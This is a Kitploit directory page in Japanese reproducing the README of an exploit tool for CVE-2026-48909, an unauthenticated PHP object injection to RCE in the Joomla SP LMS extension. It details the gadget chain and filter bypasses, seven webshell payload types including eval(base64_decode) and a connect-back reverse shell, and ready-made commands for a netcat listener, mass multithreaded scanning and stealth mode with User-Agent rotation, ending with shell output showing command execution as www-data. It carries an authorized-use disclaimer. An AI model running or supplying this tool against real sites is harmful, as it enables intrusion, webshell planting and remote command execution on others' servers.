Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-48909-Joomla-SP-Exploit — CVE-2026-48909 - Joomla SP LMS拡張機能バージョン<= 4.1.3の認証されていないPHPオブジェクトインジェクションからRCEへのエクスプロイト。lmsOrders Cookieの逆シリアル化を悪用し、Joomla FormattedtextLoggerガジェットチェーンを介してWebシェルを書き込みます。インタラクティブシェル、パス発見、クリーンアップを含みます。許可されたセキュリティテストのみを対象としています。 | Kitploit
ツール/GitHubGitHub/cerberusmrxi/cve-2026-48909-joomla-sp-exploit
脆弱性分析コード分析エクスプロイトシェルコードウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育レッドチーミング
ペイロード開発
ラボと実践
GitHubcerberusmrxi/cve-2026-48909-joomla-sp-exploit

CVE-2026-48909-Joomla-SP-Exploit

CVE-2026-48909 - Joomla SP LMS拡張機能バージョン<= 4.1.3の認証されていないPHPオブジェクトインジェクションからRCEへのエクスプロイト。lmsOrders Cookieの逆シリアル化を悪用し、Joomla FormattedtextLoggerガジェットチェーンを介してWebシェルを書き込みます。インタラクティブシェル、パス発見、クリーンアップを含みます。許可されたセキュリティテストのみを対象としています。

リポジトリを見る
2152ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-48909

Joomla SP LMS — 認証不要のPHPオブジェクトインジェクション → RCE

Python Version CVSS License Platform

CVE-2026-48909の概念実証評価ツール
著者: Sudeepa Wanigarathna

joomla1

[!IMPORTANT] 認可使用のみ。 このツールは、セキュリティ研究、教育、および自分が所有するか、明示的な書面による許可を得たシステムのテストを目的としています。コンピュータシステムへの許可のないアクセスは違法です。作者は誤用による責任を負いません。


目次

  • 概要
  • 脆弱性の詳細
  • 機能
  • インストール
  • クイックスタート
  • 使用方法ガイド
  • コマンドリファレンス
  • ペイロードタイプ
  • 攻撃チェーン
  • 出力例
  • トラブルシューティング
  • リポジトリ構成
  • バージョン履歴
  • 免責事項
  • 著者

概要

CVE-2026-48909 は、Joomla SP LMS 拡張機能における深刻な認証不要のPHPオブジェクトインジェクションです。このツールは攻撃チェーン全体を実装しており、セキュリティ専門家がラボまたは許可された環境で影響を検証できるようにします。

検出、パス探索、ペイロード配信、対話型のポストエクスプロイテーション(許可されている場合)、大量評価、およびオプションのクリーンアップをカバーします。


脆弱性の詳細

属性値
CVE IDCVE-2026-48909
CVSS9.5 (重大)
攻撃ベクトルネットワーク — 認証不要
影響リモートコード実行
影響を受ける製品Joomla SP LMS
影響を受けるバージョン1.0.0 – 4.1.3
修正バージョンSP LMS 4.1.4+
ガジェットチェーンJoomla < 5.2.2 が必要

互換性マトリックス

コンポーネントバージョンRCE
SP LMS< 4.1.4脆弱
SP LMS≥ 4.1.4修正済み
Joomla< 5.2.2ガジェットチェーン使用可能
Joomla≥ 5.2.2ガジェットチェーン修正済み

機能

コア

機能説明
認証不要のエクスプロイト資格情報不要
複数のペイロード7種類のウェブシェル / 実行バリアント
対話型シェル展開後のコマンド履歴セッション
パス探索自動的な書き込み可能パスのプロービング
クリーンアップテスト後に展開したウェブシェルを削除

評価と運用

機能説明
大量スキャンマルチスレッドのターゲットリスト(1000以上)
プロキシ対応HTTP/SOCKS(Burp, ZAP など)
リバースシェルリスナーベースのペイロード
ステルスモードヘッダー / POST 指向のコマンドチャネル
ランダム化UUID シェル名、User-Agent ローテーション
レポートJSON、HTML、CSV としてエクスポート
検出支援Joomla バージョンチェック、--check-only、--safe-mode

回避に関する注意事項

  • 可能な場合は Joomla の cmd フィルターでブロックされる文字を回避
  • Base64 パディング / スラッシュの問題を減らすために、PHP 書き込みパスを16進エンコード
  • 設定可能な遅延と User-Agent のローテーション
  • 複数のインジェクション / パス候補にわたるリトライロジック

インストール

前提条件

  • Python 3.6+
  • pip
  • テスト対象へのネットワーク到達可能性

セットアップ

cd exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 "CVE-2026-48909 v3.0.py" --help

依存関係

requests>=2.31.0
urllib3>=2.0.0

argparse は Python 標準ライブラリに同梱されています。pip でインストールする必要はありません。


クイックスタート

https://target.example はラボまたは許可されたターゲットにのみ置き換えてください。

単一ターゲット — パス探索 + 対話型シェル

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

安全なチェック(エクスプロイトなし)

python3 "CVE-2026-48909 v3.0.py" https://target.example --check-only
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode

大量スキャン

python3 "CVE-2026-48909 v3.0.py" --targets targets.txt --threads 20 --export results.html --export-format html

リバースシェル(許可されたラボ)

# リスナー
nc -lvnp 4444

# エクスプロイトホスト
python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path \
  --shell-type reverse \
  --reverse-host 192.168.1.100 \
  --reverse-port 4444

使用方法ガイド

パス探索

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path

既知の書き込み可能パス

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /var/www/html/tmp/shell.php

対話型セッション

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

ワンショットコマンド

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

ステルスペイロード + 対話型

python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path --interactive

プロキシ(Burp / ZAP)

python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path --interactive \
  --proxy http://127.0.0.1:8080 \
  --insecure

クリーンアップ

python3 "CVE-2026-48909 v3.0.py" https://target.example --cleanup /tmp/x.php

ターゲットリストの形式

https://lab-a.example
https://lab-b.example
https://lab-c.example
python3 "CVE-2026-48909 v3.0.py" -T targets.txt --threads 50 --export scan.json

コマンドリファレンス

ターゲット

引数説明
target単一ターゲットのURL
--targets, -T FILEターゲットのファイル(1行に1URL)
--path PATHウェブシェルの絶対サーバーパス
--shell-type TYPEminimal, standard, stealth, base64, full, reverse, blindshell
--shell-name NAMEウェブシェルのファイル名(デフォルト: x.php)

ネットワーク

引数説明
--timeout SECONDSリクエストのタイムアウト(デフォルト: 15)
--insecureTLS証明書の検証をスキップ
--proxy URL例: http://127.0.0.1:8080
--random-uaUser-Agentをローテーション(デフォルトで有効)
--delay SECONDSリクエスト間の遅延

リバースシェル

引数説明
--reverse-host HOSTリスナーホスト
--reverse-port PORTリスナーポート

モード

引数説明
--interactive, -i展開後の対話型シェル
--check-only脆弱性チェックのみ
--safe-mode非破壊テスト
--find-path書き込み可能パスを自動検出
--cmd COMMAND1つのコマンドを実行して終了
--cleanup PATH指定パスのウェブシェルを削除
--cleanup-afterエクスプロイト後にクリーンアップ

大量スキャン / レポート

引数説明
--threads NUMワーカースレッド数(デフォルト: 10)
--export FILE結果の出力パス
--export-format FORMATjson, html, csv(デフォルト: json)

ログ

引数説明
--log-file FILEログをファイルに書き込み
--quiet, -qクワイエットモード
--verbose, -v詳細出力
--no-bannerバナーを非表示

ペイロードタイプ

タイプ動作一般的な用途
minimalコンパクトなGETベース実行スペース制限 / クイックテスト
standardGET + POST cmd(デフォルト)一般的な評価
stealthX-Cmd ヘッダーを介したコマンドURLログの削減
base64POST経由の eval(base64_decode(...))フィルター回避ラボ
fullGET/POST + base64チャネルより広範な制御
reverseコネクトバックシェル持続的なラボアクセス
blindshell代替インクルード / 実行パターン制約のある環境
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type minimal --find-path
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path -i
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type reverse \
  --reverse-host 10.0.0.1 --reverse-port 4444 --find-path

攻撃チェーン

flowchart TD
    A["Attacker-controlled lmsOrders cookie"] --> B["unserialize() in cart.php"]
    B --> C["FormattedtextLogger::__destruct()"]
    C --> D["File::write() — PHP drop"]
    D --> E["Webshell on disk"]
    E --> F["Remote command execution"]

技術概要

  1. シンク — components/com_splms/models/cart.php は base64 デコードされた lmsOrders クッキーを unserialize します。
  2. ガジェット — Joomla\CMS\Log\Logger\FormattedtextLogger::__destruct() がファイルシステムへの書き込みをトリガーします。
  3. ペイロード — PHP 本体は16進エンコードされ、フィルターされる base64 文字(/, =, +)を避けるために長さがパディングされます。
  4. 実行 — ドロップされたスクリプトが要求され、OS コマンドが実行されます。

入力フィルターのバイパス(概要)

Joomla の cmd フィルターは /, =, + を削除する可能性があります。このツールは以下で補償します:

  • 書き込みコンテンツを16進としてエンコード
  • シリアル化 / base64 形式をパディングして不正文字を回避
  • フィルターセーフなペイロードが生成されるまで候補を反復

出力例

対話型セッション

shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

shell> whoami
www-data

shell> pwd
/var/www/html

shell> exit
ツールをダウンロード